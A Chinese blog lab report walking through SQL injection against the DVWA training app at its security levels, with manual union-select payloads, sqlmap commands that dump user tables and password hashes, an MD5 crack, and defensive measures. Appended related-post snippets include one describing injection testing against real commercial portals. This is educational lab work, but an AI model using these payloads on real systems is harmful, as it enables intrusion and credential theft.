Web漏洞分析(dvwa、SQL手工注入、sqlmap注入)

已于 2023-09-26 22:48:39 修改
阅读量4.5k 收藏 65
点赞数 11
分类专栏: 渗透 软件安全 文章标签: sql 数据库 dvwa sqlmap sql注入
于 2022-11-07 21:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58138734/article/details/127739487
版权

目录

一、实验目的

二、实验软硬件要求

三、实验预习

四、实验内容(实验步骤、测试数据等)

五、实验步骤

(1) 下载并安装配置DVWA

(2)运行DVWA,创建数据库。

(3) 登录DVWA

(4) 按教材操作流程完成SQ注入分析,验证不同安全级别情况下sql注入的风险,并就实现结果提出安全应对建议。

设置低级防护:根本没有安全措施

1.判断是否存在注入

2.猜解SQL查询语句中的字段数及字段顺序

3.获取当前数据名

4.获取数据库的表名

5.获取表中的字段名

6.获取user及password

7.尝试破解口令

设置中等级防护:发人员试图保护应用程序但失败

1)判断是否存在注入,是字符还是数字

2)猜测SQL查询语句中的字段数

3)获取当前数据名

4)获取数据库的表名

5)获取表中的字段名

6)获取user及password

设置高级防护:对中等难度的扩展,混合了更难或替代性的错误做法来尝试保护代码。该漏洞可能不允许进行相同程度的攻击,类似于各种CTF比赛。

设置不可能级防护:此级别应针对所有漏洞进行安全保护。它用于将易受攻击的源代码与安全源代码进行比较。

sqlmap注入

爆破数据库

爆破dvwa的表

爆破dvwa的guestbook的字段

爆破密码

前情提要

原本实验没有要求sqlmap等操作,听说是做到low等级就好,自行辨别。

一、实验目的

借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。

二、实验软硬件要求

1、操作系统:windows 7/8/10等

2、开发环境:DVWA

三、实验预习

《软件安全技术》教材第4章

四、实验内容(实验步骤、测试数据等)

1. 目标:案例4-2。

2. 实验说明:借助Web漏洞教学和演练的开源工具DVWA,验证SQL注入漏洞的实现过程及结果

3. 步骤:

  1. 判断是否存在注入
  2. 猜解SQL查询语句中的字段数及字段顺序
  3. 获取当前数据名
  4. 获取数据库的表名
  5. 获取表中的字段名
  6. 获取user及password
  7. 尝试破解口令

(5)完成实验报告

4. 要求:提供实验步骤说明及相应截图,完成实验报告。

五、实验步骤

(1) 下载并安装配置DVWA

书上安装XAMPP,但我不打算安装,我用phpstudy进行

安装phpstudy

启动Apache

浏览器输入http://localhost/

下载DVWA,将DVWA文件夹放在WWW文件夹下

打开phpstudy,创建域名

修改配置文件config.inc.php,如果没有就复制一份config.inc.php.dist

修改password为root(书上为空密码),user改为root

(2)运行DVWA,创建数据库。

打开首页http://dvwa(或者直接dvwa),

拉到最下方,点击create/reset database初始化数据库

(3) 登录DVWA

输入admin,password

(4) 按教材操作流程完成SQ注入分析,验证不同安全级别情况下sql注入的风险,并就实现结果提出安全应对建议。

设置低级防护:根本没有安全措施

源代码:

1.判断是否存在注入

输入1

输入1’and’1’=’2

输入1'or'1'='1

2.猜解SQL查询语句中的字段数及字段顺序

输入1’ or 1=1 order by 1 #

输入1’ or 1=1 union select 1,2,3,4,5,6,7,8#

判断只有两个字段

输入1' or 1=1 order by 3#

核实只有两字段

输入' union select 1,2#

3.获取当前数据名

输入'union select user(),database() #

4.获取数据库的表名

输入' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

有时候会出现这个字符集不兼容的问题,DVWA问题

在sql语句from前添加COLLATE utf8_general_ci即可

输入1' union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema=database()#

5.获取表中的字段名

输入' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

输入1' union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name='users'#

6.获取user及password

输入' union select user,password from users#

7.尝试破解口令

口令是32位,数据库常用加密md5,盲猜md5

5f4dcc3b5aa765d61d8327deb882cf99

设置中等级防护:发人员试图保护应用程序但失败

源代码:

它的用户交互界面变成了选项,阻挡了一些的注入

在提交id的过程中,发现页面刷新很快,上交的携带参数url无法肉眼捕捉,可以利用bp来搞。

上号bp

1)判断是否存在注入,是字符还是数字

先试试抓包,拦截,换参数,上传一波流能不能成功

进行尝试注入1' or 1=1 #

看到回应报文

更改注入1 or 1=1 #

回应报文,成功

2)猜测SQL查询语句中的字段数

更改参数为1 order by 2#,成功

更改参数为1 order by 3#,失败

只有两个字段

3)获取当前数据名

更改参数1 union select user(),database() #

4)获取数据库的表名

更改参数1 union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema=database()#

5)获取表中的字段名

更改参数1 union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name='users'#

但这个注入又很奇怪

6)获取user及password

更改参数1 union select user,password from users#

设置高级防护:对中等难度的扩展,混合了更难或替代性的错误做法来尝试保护代码。该漏洞可能不允许进行相同程度的攻击,类似于各种CTF比赛。

源代码:

与medium级别代码相比,high级别的只是在SQL查询语句中增加limit 1,希望以此控制只输出一个结果。

虽然增加limit 1,但是可以通过#将其注释掉。

手工注入的过程与low级别基本一样,直接最后一部演示下载数据

输入' union select group_concat(user_id,first_name,last_name),group_concat(password) from user #

设置不可能级防护:此级别应针对所有漏洞进行安全保护。它用于将易受攻击的源代码与安全源代码进行比较。

源代码:

impossible级别的代码采用了PDO技术,划清了代码与数据的界限,能有效防御sql注入,同时查询返回结果数量为1时,才会成功输出,这样有效预防了脱裤。

sqlmap注入

此外,我进行了sqlmap注入,这比手工快多了。但要注意命令格式

sqlmap.py -u "http://192.168.141.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u26qutkcu5ak4p0icnii8rppo1"  -dbms mysql -dbs

dvwa靶场有外部登入,所以需要加上cookie,cookie在php info里面查找

爆破数据库

 

爆破dvwa的表

sqlmap.py -u "http://192.168.141.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u26qutkcu5ak4p0icnii8rppo1"  -dbms mysql -D dvwa --tables

爆破dvwa的guestbook的字段

sqlmap.py -u "http://192.168.141.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u26qutkcu5ak4p0icnii8rppo1"  -D “dvwa”  -T ”users” --columns

爆破密码

sqlmap.py -u "http://192.168.141.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u26qutkcu5ak4p0icnii8rppo1" -D "dvwa" -T "users" -C "user,password" --dump

六、实验体会(遇到的问题及解决方法)

麻烦,文档不能完整上传,图片要单贴。实验步骤有进行略微跳步,但跳的都是简单操作,如果不懂了话,需要去补充一些相关内容。

SQL注入防护手段:

  1. 参数类型检测
  2. 参数长度检测
  3. 危险参数过滤
  4.      黑名单过滤
  5.      白名单过滤
  6.      GPC过滤(PHP.in配置中,magic_quotes_qpc=on,可以自动对输入语句转义)
  7. 参数化查询
  8. 服务器对网站的权限最小化
Web漏洞的挖掘与利用
weixin_53872203的博客
04-04 4954
本文章仅供学习分享使用,不做任何违法行为!!! 一.漏洞的挖掘 sql注入漏洞: 判断一个网站是否存在一个sql注入漏洞?Id=1 如果判断出来存在sql注入漏洞,则进判断sql注入的闭合字符 ?id=1’and 1=1 ?id=1’and 1=2 判断列数 ,采用二分法进行判断 order by 10 判断显示位,假设显示位为3,则order by 1,2,3 爆数据库,在爆数据库的前提下,爆一下网站的版本 Order by 1,database(),version() 爆表名 gr...
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测
博文视点(北京)官方博客
10-28 8990
对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测 本文节选自《大中型网络入侵要案直击与防御》一书   此外,笔者对搜狐及TOM和网易这三大门户网站作了注入攻击检测,发现同样存在明显的注入漏洞,安全性很糟糕。 1.MySQL注入检测搜狐门户网站 首先,来看看搜狐网站,搜狐网站上的动态网页大部分是采用PHP语言编写的,同样注入也很多。例如: http://app.sh.sohu.com/lo***l/s.php?id=636 这个网页是一个欧莱雅广告页面,未对提交的数字参数进行检测,可直接利用
DVWA靶场通关——SQL Injection篇
最新发布
bsefef的博客
03-05 734
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题
WEB漏洞检测与挖掘
过程
07-26 1377
XSS漏洞挖掘: 1、url参数,可以设想该参数是以怎么样的形式表现在页面,然后进行注入     如:a = b , b的值可以任意, 在页面中可能之间就显示a,这时候它    的值如果有注入问题就出现了。    url参数黑色可以五花八门,    所以请注意了, 注意好所有是字符串类型的参数,这种参数往往容易存在这种url参数的注入问题。 待续..........
DVWASQL注入漏洞SQLmap
leaf_lucky的博客
01-24 963
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。点击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。
实验五:常见WEB漏洞挖掘与利用
kelxLZ的博客
05-12 2232
Author:ZERO-A-ONE Date:2021-05-11 一、实验题目 1.1 SQL注入 目标:通过SQL注入拿到flag https://sqli.littlefisher.me/Less-1/?id=1 1.2 XSS注入 目标:通过构造xss语句进行弹窗 题目一 http://test.ctf8.com/level1.php?name=test 题目二 http://test.ctf8.com/level2.php?keyword=test 题目三 http://test.ctf.
DVWASQL注入
qq_46416934的博客
07-29 1361
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶场SQL注入漏洞(low)
m0_59343440的博客
01-18 4211
一:手工注入 手工注入常规思路: 1、判断是否存在注入注入是字符型还是数字型 2、猜解SQL查询语句中的字段数 3、确定回显位置 4、获取当前数据库,获取数据库中的表,获取字段名 5、得到数据 判断是否存在注入 先在输入框输入1,可以得到正常回显 输入单引号',页面报错,存在注入漏洞 输入1 and 1=1和 1 and 1=2,页面无变化 输入 1' or' 1'=' 1,字符型注入漏洞 查询字段数 输入1' order by 2#,回显正常 ..
通过DVWA学习SQL注入漏洞
热门推荐
Mi1k7ea
02-21 2万+
此篇文章作为本人的学习小笔记,有任何不足之处望各位大牛多多指教~ SQL注入漏洞作为OWASP TOP10中重要的一部分,可见其安全性的危害有多大。简单地说,SQL注入就是通过构建特殊的具有SQL语法的语句,绕到数据库中进而执行相应的操作的漏洞。关于SQL注入更多的描述就不再多说了,网上资料也很多,下面就直接上笔记。 基于报错的检测方法: 各种符号以及组合: ‘  “  (  %
DVWA SQL注入
m0_55605024的博客
03-01 595
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2337
SQL注入与自动注入
web应用漏洞挖掘技术
赵加美的专栏
07-30 448
单位组织的web应用漏洞挖掘技术的讲座,刚好之前工作接触过SQL注入和文件处理漏洞攻击的相关内容,所以对这方面稍微有点儿了解,也想通过讲座学习一下别人的想法和分享的知识。简单记录一下讲座内容。 图自网络 web发展趋势1、web1.0时代:门户网站时代,1989年-2000年,11年的时间2、web2.0时代:用户创造时代,从2001年开始算起。前...
sql注入遇到的问题
luminous_you的博客
09-02 170
CA证书问题 https://www.cnblogs.com/slpawn/p/7235105.html 我用的firefoxproxy代理+burpsuite 1.下载证书,导入证书 2.打开firefoxproxy代理和burpsuite端口配置一样 联合注入时出现Illegal mix of collations for operation ‘UNION’ 原因: 字段编码不同导致的问题 相同字段的编码为utf8_general_ci 与 utf8_unicode_ci , 就会报Illegal mi
sql注入遇到的一些问题
cppsu10net1的博客
01-19 260
一、字符型注入的思想是闭合引号: select 1,2 from tables where id=‘ID’ ID: ’ or 1=1’ 、 ’ or 1=1# 、’ or 1=1– 步骤: 1、先判断当前表的字段数 ’ order by 1(2,3,4,5…) #,直到出现错误,说明只有几个字段 2、知道了字段数之后,测试哪几个字段可以回显,比如有3个字段,那么 ’ union select 1,2,3 # 比如1和3能显示,说明第一列和第三列的字段可以回显 3、利用数据库的函数显示需要的信息 1. '
SQL注入问题
hhgxysxj的博客
01-19 1722
下述操作将会以MySql数据库为例 引用的是ums库中的t_user表 表中只有一条数据,username与password的数据均为admin 1.简介 SQL注入攻击是比较常见的网络攻击方式之一 它不是利用操作系统的BUG来实现攻击,而是发生于应用程序之数据库层的安全漏洞。 针对程序员编写时的疏忽通过SQL语句,实现无账号登录,甚至篡改数据库 简单来讲,是在输入的字符串之中注入SQL的指令 那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行 因此遭到破坏或是入.
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
weixin_60838266的博客
07-24 2834
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 6932
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
dvwasql注入中级sqlmap
12-31
### 使用 sqlmapDVWA 中级模式执行 SQL 注入 对于在 DVWA (Damn Vulnerable Web Application) 的中级安全设置下利用 sqlmap 执行 SQL 注入测试,可以按照如下方法操作: 通过命令行调用 sqlmap 工具并指定目标 URL 和其他必要参数来启动攻击。为了适应 DVWA 的特定环境,需要提供会话 cookie 来绕过应用的安全级别检查。 ```bash sqlmap -u "http://target_ip/DVWA-master/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=session_id" --data="id=1&Submit=Submit#" -p id --batch -D dvwa --tables ``` 上述命令中 `target_ip` 是运行 DVWA 应用程序的目标服务器 IP 地址;`session_id` 需要替换为实际有效的 PHPSESSID 值[^3]。 此命令将会自动探测注入点,并尝试从中提取数据库结构信息,包括可用的数据表名称等。如果想要进一步获取某个具体数据表内的列名,则可以在之前的基础上追加相应的选项继续探索。 一旦获得了足够的权限或访问到了敏感数据之后,请务必负责任地处理这些信息,在合法授权范围内开展研究工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王陈锋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值